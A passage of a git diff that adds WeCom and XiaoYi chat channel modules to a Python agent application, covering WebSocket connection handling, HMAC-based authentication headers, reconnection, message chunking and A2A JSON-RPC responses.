"darwin": + ws_loop = asyncio.SelectorEventLoop() + else: + ws_loop = asyncio.new_event_loop() + asyncio.set_event_loop(ws_loop) + + # Set thread name for debugging + threading.current_thread().name = "wecom-ws" + + try: + # Run connection in the new loop + ws_loop.run_until_complete(self._client.connect()) + ws_loop.run_forever() + except Exception: + logger.exception("wecom WebSocket thread failed") + finally: + try: + # Cancel all pending tasks + pending = asyncio.all_tasks(ws_loop) + for task in pending: + task.cancel() + if pending: + ws_loop.run_until_complete( + asyncio.gather(*pending, return_exceptions=True), + ) + ws_loop.run_until_complete(ws_loop.shutdown_asyncgens()) + ws_loop.close() + except Exception: + pass + + async def start(self) -> None: + if not self.enabled: + logger.debug("wecom channel disabled") + return + + if not self.bot_id or not self.secret: + raise RuntimeError( + "WECOM_BOT_ID and WECOM_SECRET are required when " + "the wecom channel is enabled.", + ) + + self._loop = asyncio.get_running_loop() + options = WSClientOptions( + bot_id=self.bot_id, + secret=self.secret, + max_reconnect_attempts=self._max_reconnect_attempts, + ) + self._client = WSClient(options) + + # Register event handlers + self._client.on("message", self._on_message_sync) + self._client.on("event.enter_chat", self._on_enter_chat_sync) + + self._ws_thread = threading.Thread( + target=self._run_ws_forever, + daemon=True, + name="wecom-ws", + ) + self._ws_thread.start() + logger.info( + "wecom channel started (bot_id=%s)", + (self.bot_id or "")[:12], + ) + + async def stop(self) -> None: + if not self.enabled: + return + if self._client: + try: + self._client.disconnect() + except Exception: + pass + if self._ws_thread: + self._ws_thread.join(timeout=5) + self._client = None + logger.info("wecom channel stopped") diff --git a/src/copaw/app/channels/wecom/utils.py b/src/copaw/app/channels/wecom/utils.py new file mode 100644 index 000000000..b32ed5eb2 --- /dev/null +++ 
b/src/copaw/app/channels/wecom/utils.py @@ -0,0 +1,108 @@ +# -*- coding: utf-8 -*- +"""WeCom channel utilities.""" +from __future__ import annotations + +import re +from typing import List + + +def format_markdown_tables(text: str) -> str: + """Format GFM markdown tables for WeCom compatibility. + + WeCom requires table columns to be properly aligned. + This function normalizes table formatting. + + Args: + text: Input markdown text possibly containing tables. + + Returns: + Text with formatted tables. + """ + lines = text.split("\n") + result: List[str] = [] + i = 0 + in_code_fence = False + while i < len(lines): + line = lines[i] + stripped = line.strip() + # Track fenced code blocks (```), pass through inside lines unchanged. + if stripped.startswith("```"): + in_code_fence = not in_code_fence + result.append(line) + i += 1 + continue + if in_code_fence: + result.append(line) + i += 1 + continue + # Detect table start (line with |) when not inside a code fence + if "|" in line: + # Collect table lines + table_lines: List[str] = [] + while ( + i < len(lines) + and "|" in lines[i] + and not lines[i].strip().startswith("```") + ): + table_lines.append(lines[i]) + i += 1 + # Format and add table + if table_lines: + result.extend(_format_table(table_lines)) + continue + result.append(line) + i += 1 + return "\n".join(result) + + +def _format_table(lines: List[str]) -> List[str]: + """Format a single markdown table.""" + if not lines: + return lines + + # Check if second row is separator (contains only -, :, |, spaces) + sep_pattern = re.compile(r"^[\s\-:|]+$") + has_separator = len(lines) >= 2 and sep_pattern.match(lines[1]) is not None + + # Parse cells, skipping the separator row (it will be rebuilt) + rows: List[List[str]] = [] + for idx, line in enumerate(lines): + if has_separator and idx == 1: + continue # Skip separator row; rebuild it from column widths + cells = [c.strip() for c in line.split("|")] + # Remove empty first/last cells from leading/trailing | + 
if cells and not cells[0]: + cells = cells[1:] + if cells and not cells[-1]: + cells = cells[:-1] + if cells: + rows.append(cells) + + if not rows: + return lines + + # Calculate column widths + col_count = max(len(r) for r in rows) + widths: List[int] = [0] * col_count + for row in rows: + for j in range(col_count): + cell = row[j] if j < len(row) else "" + widths[j] = max(widths[j], len(cell)) + + # Format rows with proper padding, inserting separator after header + formatted: List[str] = [] + for idx, row in enumerate(rows): + padded = [ + (row[j] if j < len(row) else "").ljust(widths[j]) + for j in range(col_count) + ] + formatted.append("| " + " | ".join(padded) + " |") + if idx == 0: + sep = ( + "| " + + " | ".join("-" * max(3, widths[j]) for j in range(col_count)) + + " |" + ) + formatted.append(sep) + + return formatted diff --git a/src/copaw/app/channels/xiaoyi/__init__.py b/src/copaw/app/channels/xiaoyi/__init__.py new file mode 100644 index 000000000..77a4fc983 --- /dev/null +++ b/src/copaw/app/channels/xiaoyi/__init__.py @@ -0,0 +1,17 @@ +# -*- coding: utf-8 -*- +"""XiaoYi channel module. + +XiaoYi (小艺) is Huawei's voice assistant platform. +This module implements A2A (Agent-to-Agent) protocol support. +""" + +from .channel import XiaoYiChannel +from .auth import generate_auth_headers, XiaoYiAuth +from .constants import DEFAULT_WS_URL + +__all__ = [ + "XiaoYiChannel", + "generate_auth_headers", + "XiaoYiAuth", + "DEFAULT_WS_URL", +] diff --git a/src/copaw/app/channels/xiaoyi/auth.py b/src/copaw/app/channels/xiaoyi/auth.py new file mode 100644 index 000000000..64e65babb --- /dev/null +++ b/src/copaw/app/channels/xiaoyi/auth.py @@ -0,0 +1,67 @@ +# -*- coding: utf-8 -*- +""" +XiaoYi authentication using AK/SK mechanism. +""" + +from __future__ import annotations + +import base64 +import hashlib +import hmac +import time +from typing import Dict + + +def generate_signature(sk: str, timestamp: str) -> str: + """Generate HMAC-SHA256 signature. 
+ + Format: Base64(HMAC-SHA256(secretKey, timestamp)) + + Args: + sk: Secret Key + timestamp: Timestamp as string (milliseconds) + + Returns: + Base64 encoded signature + """ + hmac_obj = hmac.new(sk.encode(), timestamp.encode(), hashlib.sha256) + return base64.b64encode(hmac_obj.digest()).decode() + + +def generate_auth_headers(ak: str, sk: str, agent_id: str) -> Dict[str, str]: + """Generate WebSocket authentication headers. + + Args: + ak: Access Key + sk: Secret Key + agent_id: Agent ID + + Returns: + Dict of headers for WebSocket connection + """ + timestamp = str(int(time.time() * 1000)) + signature = generate_signature(sk, timestamp) + + return { + "x-access-key": ak, + "x-sign": signature, + "x-ts": timestamp, + "x-agent-id": agent_id, + } + + +class XiaoYiAuth: + """XiaoYi authentication helper class.""" + + def __init__(self, ak: str, sk: str, agent_id: str): + self.ak = ak + self.sk = sk + self.agent_id = agent_id + + def get_auth_headers(self) -> Dict[str, str]: + """Get authentication headers for WebSocket connection.""" + return generate_auth_headers(self.ak, self.sk, self.agent_id) + + def generate_signature(self, timestamp: str) -> str: + """Generate signature for given timestamp.""" + return generate_signature(self.sk, timestamp) diff --git a/src/copaw/app/channels/xiaoyi/channel.py b/src/copaw/app/channels/xiaoyi/channel.py new file mode 100644 index 000000000..8c39e980e --- /dev/null +++ b/src/copaw/app/channels/xiaoyi/channel.py @@ -0,0 +1,1456 @@ +# -*- coding: utf-8 -*- +"""XiaoYi Channel implementation. + +XiaoYi uses A2A (Agent-to-Agent) protocol over WebSocket. 
+""" + +from __future__ import annotations + +import asyncio +import json +import logging +import uuid +from typing import Any, Dict, List, Optional, TYPE_CHECKING + +import aiohttp + +from agentscope_runtime.engine.schemas.agent_schemas import ( + ContentType, + TextContent, +) + +from ....config.config import XiaoYiConfig as XiaoYiChannelConfig +from ..base import ( + BaseChannel, + OnReplySent, + OutgoingContentPart, + ProcessHandler, +) +from ..renderer import MessageRenderer, RenderStyle +from .auth import generate_auth_headers +from .constants import ( + CONNECTION_TIMEOUT, + DEFAULT_TASK_TIMEOUT_MS, + HEARTBEAT_INTERVAL, + MAX_RECONNECT_ATTEMPTS, + RECONNECT_DELAYS, + TEXT_CHUNK_LIMIT, +) + +logger = logging.getLogger(__name__) + +if TYPE_CHECKING: + from agentscope_runtime.engine.schemas.agent_schemas import AgentRequest + + +# Class-level registry to track active connections per agent_id +# This prevents multiple channel instances with same agent_id from conflicting +_active_connections: Dict[str, "XiaoYiChannel"] = {} +_active_connections_lock = asyncio.Lock() + + +class XiaoYiChannel(BaseChannel): + """XiaoYi channel using A2A protocol over WebSocket. + + This channel connects to XiaoYi server as a WebSocket client + and handles A2A (Agent-to-Agent) protocol messages. 
+ """ + + channel = "xiaoyi" + uses_manager_queue = True + + def __init__( + self, + process: ProcessHandler, + enabled: bool, + ak: str, + sk: str, + agent_id: str, + ws_url: str, + task_timeout_ms: int = DEFAULT_TASK_TIMEOUT_MS, + on_reply_sent: OnReplySent = None, + show_tool_details: bool = True, + filter_tool_messages: bool = False, + filter_thinking: bool = False, + bot_prefix: str = "", + dm_policy: str = "open", + group_policy: str = "open", + allow_from: Optional[List[str]] = None, + deny_message: str = "", + ): + super().__init__( + process, + on_reply_sent=on_reply_sent, + show_tool_details=show_tool_details, + filter_tool_messages=filter_tool_messages, + filter_thinking=filter_thinking, + dm_policy=dm_policy, + group_policy=group_policy, + allow_from=allow_from, + deny_message=deny_message, + ) + + # XiaoYi platform supports markdown and code fences + # Tool call arguments should be in code blocks for better readability + self._render_style = RenderStyle( + show_tool_details=show_tool_details, + filter_tool_messages=filter_tool_messages, + filter_thinking=filter_thinking, + supports_markdown=True, + supports_code_fence=True, + use_emoji=True, + ) + self._renderer = MessageRenderer(self._render_style) + + self.enabled = enabled + self.ak = ak + self.sk = sk + self.agent_id = agent_id + self.ws_url = ws_url + self.task_timeout_ms = task_timeout_ms + self.bot_prefix = bot_prefix + + # WebSocket state + self._ws: Optional[aiohttp.ClientWebSocketResponse] = None + self._session: Optional[aiohttp.ClientSession] = None + self._connected = False + self._reconnect_attempts = 0 + self._stopping = False # Flag to prevent reconnect during stop + + # Session -> task_id mapping + self._session_task_map: Dict[str, str] = {} + + # Heartbeat task + self._heartbeat_task: Optional[asyncio.Task] = None + + # Receive loop task + self._receive_task: Optional[asyncio.Task] = None + + @classmethod + def from_env( + cls, + process: ProcessHandler, + on_reply_sent: OnReplySent = 
None, + ) -> "XiaoYiChannel": + """Create channel from environment variables.""" + import os + + return cls( + process=process, + enabled=os.getenv("XIAOYI_CHANNEL_ENABLED", "0") == "1", + ak=os.getenv("XIAOYI_AK", ""), + sk=os.getenv("XIAOYI_SK", ""), + agent_id=os.getenv("XIAOYI_AGENT_ID", ""), + ws_url=os.getenv( + "XIAOYI_WS_URL", + "wss://hag.cloud.huawei.com/openclaw/v1/ws/link", + ), + on_reply_sent=on_reply_sent, + ) + + @classmethod + def from_config( + cls, + process: ProcessHandler, + config: XiaoYiChannelConfig, + on_reply_sent: OnReplySent = None, + show_tool_details: bool = True, + filter_tool_messages: bool = False, + filter_thinking: bool = False, + ) -> "XiaoYiChannel": + """Create channel from config object.""" + if isinstance(config, dict): + return cls( + process=process, + enabled=config.get("enabled", False), + ak=config.get("ak", ""), + sk=config.get("sk", ""), + agent_id=config.get("agent_id", ""), + ws_url=config.get( + "ws_url", + "wss://hag.cloud.huawei.com/openclaw/v1/ws/link", + ), + task_timeout_ms=config.get( + "task_timeout_ms", + DEFAULT_TASK_TIMEOUT_MS, + ), + on_reply_sent=on_reply_sent, + show_tool_details=show_tool_details, + filter_tool_messages=filter_tool_messages, + filter_thinking=filter_thinking, + bot_prefix=config.get("bot_prefix", ""), + dm_policy=config.get("dm_policy", "open"), + group_policy=config.get("group_policy", "open"), + allow_from=config.get("allow_from"), + deny_message=config.get("deny_message", ""), + ) + + return cls( + process=process, + enabled=config.enabled, + ak=config.ak, + sk=config.sk, + agent_id=config.agent_id, + ws_url=config.ws_url, + task_timeout_ms=config.task_timeout_ms, + on_reply_sent=on_reply_sent, + show_tool_details=show_tool_details, + filter_tool_messages=filter_tool_messages, + filter_thinking=filter_thinking, + bot_prefix=config.bot_prefix, + dm_policy=config.dm_policy, + group_policy=config.group_policy, + allow_from=list(config.allow_from) if config.allow_from else None, + 
deny_message=config.deny_message, + ) + + def _validate_config(self) -> None: + """Validate required configuration.""" + if not self.ak: + raise ValueError("XiaoYi AK (Access Key) is required") + if not self.sk: + raise ValueError("XiaoYi SK (Secret Key) is required") + if not self.agent_id: + raise ValueError("XiaoYi Agent ID is required") + + async def start(self) -> None: + """Start WebSocket connection.""" + if not self.enabled: + logger.debug("XiaoYi: start() skipped (enabled=false)") + return + + try: + self._validate_config() + except ValueError as e: + logger.error(f"XiaoYi config validation failed: {e}") + return + + # Check if there's already an active connection for this agent_id + # and reuse it if only filter settings changed + global _active_connections + should_connect = True + async with _active_connections_lock: + existing = _active_connections.get(self.agent_id) + if ( + existing is not None + and existing is not self + and existing._connected # pylint: disable=protected-access + ): + # pylint: disable=protected-access + # Found active connection - update settings + logger.info( + "XiaoYi: Updating settings for existing " + f"connection agent_id={self.agent_id}", + ) + # Update render style settings on the existing channel + existing._render_style.filter_tool_messages = ( + self._render_style.filter_tool_messages + ) + existing._render_style.filter_thinking = ( + self._render_style.filter_thinking + ) + existing._render_style.show_tool_details = ( + self._render_style.show_tool_details + ) + # Re-register this instance + # (so the new instance becomes the active one) + _active_connections[self.agent_id] = self + # Copy the WebSocket state to this instance + self._ws = existing._ws + self._session = existing._session + self._connected = existing._connected + self._heartbeat_task = existing._heartbeat_task + self._receive_task = existing._receive_task + self._session_task_map = existing._session_task_map + # Mark old instance as not owning the 
connection anymore + existing._ws = None + existing._session = None + existing._connected = False + existing._heartbeat_task = None + existing._receive_task = None + should_connect = False + + if not should_connect: + logger.info( + "XiaoYi: Reused existing connection with updated settings", + ) + return + + # No existing connection or can't reuse - start new connection + await self._wait_and_register_connection() + + logger.info(f"XiaoYi: Connecting to {self.ws_url}...") + + try: + await self._connect() + except Exception as e: + logger.error(f"XiaoYi connection failed: {e}") + # Unregister on failure + await self._unregister_connection() + self._schedule_reconnect() + + async def _wait_and_register_connection(self) -> None: + """Stop any existing connection with same agent_id, then register.""" + global _active_connections + + # First, get existing connection and remove it from registry + existing = None + async with _active_connections_lock: + existing = _active_connections.get(self.agent_id) + if existing is not None and existing is not self: + # Remove from registry immediately + _active_connections.pop(self.agent_id, None) + # Register this instance + _active_connections[self.agent_id] = self + + # Now stop the old connection outside the lock + if existing is not None and existing is not self: + # pylint: disable=protected-access + logger.info( + "XiaoYi: Stopping old connection for " + f"agent_id={self.agent_id}", + ) + try: + # Set stopping flag FIRST to prevent any reconnect + existing._stopping = True + existing._connected = False + # Cancel tasks and wait for them to finish + if existing._heartbeat_task: + existing._heartbeat_task.cancel() + try: + await existing._heartbeat_task + except asyncio.CancelledError: + pass + if existing._receive_task: + existing._receive_task.cancel() + try: + await existing._receive_task + except asyncio.CancelledError: + pass + # Close WebSocket + if existing._ws: + await existing._ws.close() + if existing._session: + await 
existing._session.close() + logger.debug("XiaoYi: Old connection stopped") + except Exception as e: + logger.debug(f"XiaoYi: Error stopping old connection: {e}") + + logger.debug( + f"XiaoYi: Registered connection for agent_id={self.agent_id}", + ) + + async def _unregister_connection(self) -> None: + """Unregister this connection from active connections.""" + global _active_connections + async with _active_connections_lock: + if _active_connections.get(self.agent_id) is self: + _active_connections.pop(self.agent_id, None) + logger.debug( + "XiaoYi: Unregistered connection for " + f"agent_id={self.agent_id}", + ) + + async def _connect(self) -> None: + """Establish WebSocket connection.""" + headers = generate_auth_headers(self.ak, self.sk, self.agent_id) + + # Clean up any existing session first + await self._cleanup_session() + + self._session = aiohttp.ClientSession() + ws_timeout = aiohttp.ClientWSTimeout(ws_close=CONNECTION_TIMEOUT) + + try: + self._ws = await self._session.ws_connect( + self.ws_url, + headers=headers, + timeout=ws_timeout, + ) + + self._connected = True + self._reconnect_attempts = 0 + logger.info("XiaoYi: WebSocket connected") + + # Send init message + await self._send_init_message() + + # Start heartbeat + self._heartbeat_task = asyncio.create_task(self._heartbeat_loop()) + + # Start receive loop + self._receive_task = asyncio.create_task(self._receive_loop()) + + except Exception as e: + logger.error(f"XiaoYi: WebSocket connection error: {e}") + self._connected = False + raise + + async def _send_init_message(self) -> None: + """Send init message to server.""" + if not self._ws: + return + + init_msg = { + "msgType": "clawd_bot_init", + "agentId": self.agent_id, + } + + try: + await self._ws.send_json(init_msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send init message: {e}") + + async def _heartbeat_loop(self) -> None: + """Send heartbeat messages periodically.""" + while self._connected and self._ws: + try: + await 
asyncio.sleep(HEARTBEAT_INTERVAL) + + if not self._connected or not self._ws: + break + + heartbeat_msg = { + "msgType": "heartbeat", + "agentId": self.agent_id, + } + + await self._ws.send_json(heartbeat_msg) + + except asyncio.CancelledError: + break + except Exception as e: + logger.error(f"XiaoYi: Heartbeat error: {e}") + break + + async def _receive_loop(self) -> None: + """Receive and process messages from WebSocket.""" + if not self._ws: + return + + try: + async for msg in self._ws: + if msg.type == aiohttp.WSMsgType.TEXT: + await self._handle_message(msg.data) + elif msg.type == aiohttp.WSMsgType.ERROR: + logger.error( + f"XiaoYi: WebSocket error: {self._ws.exception()}", + ) + break + elif msg.type == aiohttp.WSMsgType.CLOSED: + logger.info("XiaoYi: WebSocket closed") + break + except asyncio.CancelledError: + pass + except Exception as e: + logger.error(f"XiaoYi: Receive loop error: {e}") + finally: + self._connected = False + # Only reconnect if not stopping + if not self._stopping: + self._schedule_reconnect() + + async def _handle_message(self, data: str) -> None: + """Handle incoming WebSocket message.""" + try: + message = json.loads(data) + logger.debug( + "XiaoYi: Received message: " + f"{json.dumps(message, indent=2)}", + ) + + # Validate agent_id + if message.get("agentId") and message["agentId"] != self.agent_id: + logger.warning( + "XiaoYi: Mismatched agentId " + f"{message['agentId']}, expected {self.agent_id}", + ) + return + + # Handle clear context + if ( + message.get("method") == "clearContext" + or message.get("action") == "clear" + ): + await self._handle_clear_context(message) + return + + # Handle tasks cancel + if ( + message.get("method") == "tasks/cancel" + or message.get("action") == "tasks/cancel" + ): + await self._handle_tasks_cancel(message) + return + + # Handle A2A request + if message.get("method") == "message/stream": + await self._handle_a2a_request(message) + + except json.JSONDecodeError as e: + logger.error(f"XiaoYi: 
Failed to parse message: {e}") + except Exception as e: + logger.error(f"XiaoYi: Error handling message: {e}", exc_info=True) + + async def _handle_a2a_request(self, message: Dict[str, Any]) -> None: + """Handle A2A request message.""" + try: + # Extract session ID + # (prefer params.sessionId, fallback to top-level) + session_id = message.get("params", {}).get( + "sessionId", + ) or message.get("sessionId") + task_id = message.get("params", {}).get("id") or message.get("id") + + if not session_id: + logger.warning("XiaoYi: No sessionId in message") + return + + # Store session -> task mapping + self._session_task_map[session_id] = task_id + + # Extract text from message parts + text_parts = [] + params = message.get("params", {}) + msg = params.get("message", {}) + parts = msg.get("parts", []) + + for part in parts: + if part.get("kind") == "text" and part.get("text"): + text_parts.append(part["text"]) + + content = " ".join(text_parts) + if not content.strip(): + logger.debug("XiaoYi: Empty message content, skipping") + return + + # Build native payload + content_parts = [TextContent(type=ContentType.TEXT, text=content)] + native = { + "channel_id": self.channel, + "sender_id": session_id, + "content_parts": content_parts, + "meta": { + "session_id": session_id, + "task_id": task_id, + "message_id": message.get("id"), + }, + } + + if self._enqueue: + self._enqueue(native) + else: + logger.warning("XiaoYi: _enqueue not set, message dropped") + + except Exception as e: + logger.error( + f"XiaoYi: Error handling A2A request: {e}", + exc_info=True, + ) + + async def _handle_clear_context(self, message: Dict[str, Any]) -> None: + """Handle clear context message.""" + session_id = message.get("sessionId") or "" + request_id = message.get("id") or "" + + logger.info(f"XiaoYi: Clear context for session {session_id}") + + # Send clear response + await self._send_clear_context_response(request_id, session_id) + + # Clean up session + if session_id: + 
self._session_task_map.pop(session_id, None) + + async def _handle_tasks_cancel(self, message: Dict[str, Any]) -> None: + """Handle tasks cancel message.""" + session_id = message.get("sessionId") or "" + request_id = message.get("id") or "" + task_id = message.get("taskId") or request_id + + logger.info(f"XiaoYi: Cancel task {task_id} for session {session_id}") + + # Send cancel response + await self._send_tasks_cancel_response(request_id, session_id) + + async def _send_clear_context_response( + self, + request_id: str, + session_id: str, + success: bool = True, + ) -> None: + """Send clear context response.""" + if not self._ws or not self._connected: + return + + json_rpc_response = { + "jsonrpc": "2.0", + "id": request_id, + "result": { + "status": {"state": "cleared" if success else "failed"}, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": request_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send clear context response: {e}") + + async def _send_tasks_cancel_response( + self, + request_id: str, + session_id: str, + success: bool = True, + ) -> None: + """Send tasks cancel response.""" + if not self._ws or not self._connected: + return + + json_rpc_response = { + "jsonrpc": "2.0", + "id": request_id, + "result": { + "id": request_id, + "status": {"state": "canceled" if success else "failed"}, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": request_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send cancel response: {e}") + + def _schedule_reconnect(self) -> None: + """Schedule reconnection attempt.""" + if self._stopping: + return + + if self._reconnect_attempts >= MAX_RECONNECT_ATTEMPTS: + 
logger.error("XiaoYi: Max reconnect attempts reached") + return + + delay_idx = min(self._reconnect_attempts, len(RECONNECT_DELAYS) - 1) + delay = RECONNECT_DELAYS[delay_idx] + self._reconnect_attempts += 1 + + logger.info( + "XiaoYi: Reconnecting in " + f"{delay}s (attempt {self._reconnect_attempts})", + ) + + async def reconnect(): + await asyncio.sleep(delay) + if self._stopping or self._connected: + return + + # Clean up old session before reconnecting + await self._cleanup_session() + + try: + await self._connect() + logger.info("XiaoYi: Reconnected successfully") + except Exception as e: + logger.error(f"XiaoYi: Reconnect failed: {e}") + self._schedule_reconnect() + + asyncio.create_task(reconnect()) + + async def _cleanup_session(self) -> None: + """Clean up WebSocket and session.""" + if self._ws: + try: + await self._ws.close() + except Exception: + pass + self._ws = None + + if self._session: + try: + await self._session.close() + except Exception: + pass + self._session = None + + async def stop(self) -> None: + """Stop WebSocket connection.""" + logger.info("XiaoYi: Stopping channel...") + + self._stopping = True # Prevent reconnect during stop + self._connected = False + + # Cancel tasks + if self._heartbeat_task: + self._heartbeat_task.cancel() + try: + await self._heartbeat_task + except asyncio.CancelledError: + pass + self._heartbeat_task = None + + if self._receive_task: + self._receive_task.cancel() + try: + await self._receive_task + except asyncio.CancelledError: + pass + self._receive_task = None + + # Close WebSocket + if self._ws: + await self._ws.close() + self._ws = None + + # Close session + if self._session: + await self._session.close() + self._session = None + + # Unregister from active connections + await self._unregister_connection() + + # Keep _stopping = True to prevent any reconnection attempts + # This channel instance will not be reused after stop + logger.info("XiaoYi: Channel stopped") + + async def send( + self, + to_handle: 
str, + text: str, + meta: Optional[Dict[str, Any]] = None, + ) -> None: + """Send text message via WebSocket. + + For A2A protocol with append=true, messages are chunked + at TEXT_CHUNK_LIMIT characters to avoid WebSocket disconnection + on large messages. + """ + if not self.enabled or not self._ws or not self._connected: + logger.warning("XiaoYi: Cannot send - not connected") + return + + meta = meta or {} + session_id = meta.get("session_id") or to_handle + task_id = meta.get("task_id") or self._session_task_map.get(session_id) + + if not task_id: + logger.warning(f"XiaoYi: No task_id for session {session_id}") + return + + # Don't send empty text + if not text or not text.strip(): + return + + # Get or create message ID for this session + message_id = meta.get("message_id", str(uuid.uuid4())) + + # Chunk text if too large + chunks = self._chunk_text(text) + + for chunk in chunks: + await self._send_chunk(session_id, task_id, message_id, chunk) + + def _chunk_text(self, text: str) -> List[str]: + """Split text into chunks of TEXT_CHUNK_LIMIT size.""" + if len(text) <= TEXT_CHUNK_LIMIT: + return [text] + + chunks = [] + # Try to split at newlines for better readability + lines = text.split("\n") + current_chunk = "" + + for line in lines: + # If single line is too long, split it + if len(line) > TEXT_CHUNK_LIMIT: + # First add any accumulated chunk + if current_chunk: + chunks.append(current_chunk.rstrip("\n")) + current_chunk = "" + + # Split long line into chunks + for i in range(0, len(line), TEXT_CHUNK_LIMIT): + chunks.append(line[i : i + TEXT_CHUNK_LIMIT]) + else: + # Check if adding this line would exceed limit + test_chunk = ( + current_chunk + "\n" + line if current_chunk else line + ) + if len(test_chunk) > TEXT_CHUNK_LIMIT: + if current_chunk: + chunks.append(current_chunk) + current_chunk = line + else: + current_chunk = test_chunk + + if current_chunk: + chunks.append(current_chunk) + + return chunks + + async def _send_chunk( + self, + session_id: 
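The chunking policy in `_chunk_text` above (prefer newline boundaries, hard-split any single overlong line) is easier to see with a small parameterized limit. A standalone sketch of the same algorithm; the real method has no `limit` parameter and uses `TEXT_CHUNK_LIMIT` (4000) from constants.py:

```python
from typing import List


def chunk_text(text: str, limit: int) -> List[str]:
    """Split text into chunks of at most `limit` chars, preferring newlines."""
    if len(text) <= limit:
        return [text]
    chunks: List[str] = []
    current = ""
    for line in text.split("\n"):
        if len(line) > limit:
            # Flush the accumulator, then hard-split the overlong line.
            if current:
                chunks.append(current.rstrip("\n"))
                current = ""
            for i in range(0, len(line), limit):
                chunks.append(line[i : i + limit])
        else:
            candidate = current + "\n" + line if current else line
            if len(candidate) > limit:
                if current:
                    chunks.append(current)
                current = line
            else:
                current = candidate
    if current:
        chunks.append(current)
    return chunks


# chunk_text("aaaa\nbb\ncc", 5) keeps "bb\ncc" together but splits off "aaaa"
```

Because newline boundaries are preferred, a chunk can come out shorter than the limit; only a single line longer than the limit is cut mid-line.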
str, + task_id: str, + message_id: str, + text: str, + ) -> None: + """Send a single text chunk via WebSocket.""" + if not self._ws or not self._connected: + logger.warning("XiaoYi: Cannot send chunk - not connected") + return + + artifact_id = f"artifact_{uuid.uuid4().hex[:16]}" + + json_rpc_response = { + "jsonrpc": "2.0", + "id": message_id, + "result": { + "taskId": task_id, + "kind": "artifact-update", + "append": True, # Append to previous messages + "lastChunk": False, # Not the last chunk + "final": False, # Not final, more content may come + "artifact": { + "artifactId": artifact_id, + "parts": [{"kind": "text", "text": text}], + }, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": task_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send message: {e}") + + async def _send_reasoning_chunk( + self, + session_id: str, + task_id: str, + message_id: str, + reasoning_text: str, + ) -> None: + """Send a single reasoning/thinking chunk via WebSocket.""" + if not self._ws or not self._connected: + logger.warning( + "XiaoYi: Cannot send reasoning chunk - not connected", + ) + return + + artifact_id = f"artifact_{uuid.uuid4().hex[:16]}" + + json_rpc_response = { + "jsonrpc": "2.0", + "id": message_id, + "result": { + "taskId": task_id, + "kind": "artifact-update", + "append": True, + "lastChunk": False, + "final": False, + "artifact": { + "artifactId": artifact_id, + "parts": [ + { + "kind": "reasoningText", + "reasoningText": reasoning_text, + }, + ], + }, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": task_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send reasoning chunk: {e}") + + async def send_final_message( + 
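Both `_send_chunk` and `_send_reasoning_chunk` above wrap a JSON-RPC `artifact-update` inside the `agent_response` envelope, with the JSON-RPC payload serialized into `msgDetail` as a string (a double encoding). A connection-free sketch of that envelope; the IDs are illustrative:

```python
import json
import uuid
from typing import Any, Dict


def build_chunk_msg(
    agent_id: str,
    session_id: str,
    task_id: str,
    message_id: str,
    text: str,
) -> Dict[str, Any]:
    rpc = {
        "jsonrpc": "2.0",
        "id": message_id,
        "result": {
            "taskId": task_id,
            "kind": "artifact-update",
            "append": True,      # append to earlier chunks of the stream
            "lastChunk": False,  # a later empty-text chunk closes the stream
            "final": False,
            "artifact": {
                "artifactId": f"artifact_{uuid.uuid4().hex[:16]}",
                "parts": [{"kind": "text", "text": text}],
            },
        },
    }
    return {
        "msgType": "agent_response",
        "agentId": agent_id,
        "sessionId": session_id,
        "taskId": task_id,
        "msgDetail": json.dumps(rpc),  # JSON-RPC payload as a string
    }


msg = build_chunk_msg("agent-1", "sess-1", "task-1", "msg-1", "hello")
detail = json.loads(msg["msgDetail"])
```

`send_final_message` sends the same shape with `lastChunk` and `final` set to `True` and an empty text part, which is what tells the client the stream has ended.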
self, + session_id: str, + task_id: str, + message_id: str, + ) -> None: + """Send final empty message to end the stream.""" + if not self.enabled or not self._ws or not self._connected: + return + + artifact_id = f"artifact_{uuid.uuid4().hex[:16]}" + + json_rpc_response = { + "jsonrpc": "2.0", + "id": message_id, + "result": { + "taskId": task_id, + "kind": "artifact-update", + "append": True, + "lastChunk": True, + "final": True, + "artifact": { + "artifactId": artifact_id, + "parts": [ + {"kind": "text", "text": ""}, + ], # Empty text for final + }, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": task_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send final message: {e}") + + async def send_media( + self, + to_handle: str, + part: OutgoingContentPart, + meta: Optional[Dict[str, Any]] = None, + ) -> None: + """Send media message via WebSocket.""" + if not self.enabled or not self._ws or not self._connected: + return + + meta = meta or {} + session_id = meta.get("session_id") or to_handle + task_id = meta.get("task_id") or self._session_task_map.get(session_id) + + if not task_id: + return + + part_type = getattr(part, "type", None) + + # Build artifact part based on content type + artifact_part: Dict[str, Any] = {"kind": "text"} + + if part_type == ContentType.IMAGE: + img_url = getattr(part, "image_url", "") + artifact_part = { + "kind": "file", + "file": { + "name": "image", + "mimeType": "image/png", + "uri": img_url, + }, + } + elif part_type == ContentType.VIDEO: + vid_url = getattr(part, "video_url", "") + artifact_part = { + "kind": "file", + "file": { + "name": "video", + "mimeType": "video/mp4", + "uri": vid_url, + }, + } + elif part_type == ContentType.FILE: + file_url = getattr(part, "file_url", "") + artifact_part = { + "kind": "file", + "file": { + "name": getattr(part, 
